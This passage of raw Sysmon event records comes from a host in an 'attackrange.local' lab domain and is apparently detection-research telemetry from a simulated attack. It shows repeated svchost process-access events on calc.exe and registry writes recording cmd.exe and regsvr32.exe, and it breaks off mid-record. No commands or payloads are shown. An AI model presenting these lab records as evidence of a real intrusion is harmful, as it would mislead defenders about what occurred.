10341000x8000000000000000360956Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360955Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360954Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360953Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 13241300x8000000000000000360952Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:49.171{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000360951Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360950Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360949Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360948Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.171{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360947Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360946Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360945Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360944Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 13241300x8000000000000000360943Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:49.155{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\system32\regsvr32.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360942Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360941Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360940Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360939Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360938Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360937Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360936Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360935Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360934Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360933Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360932Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 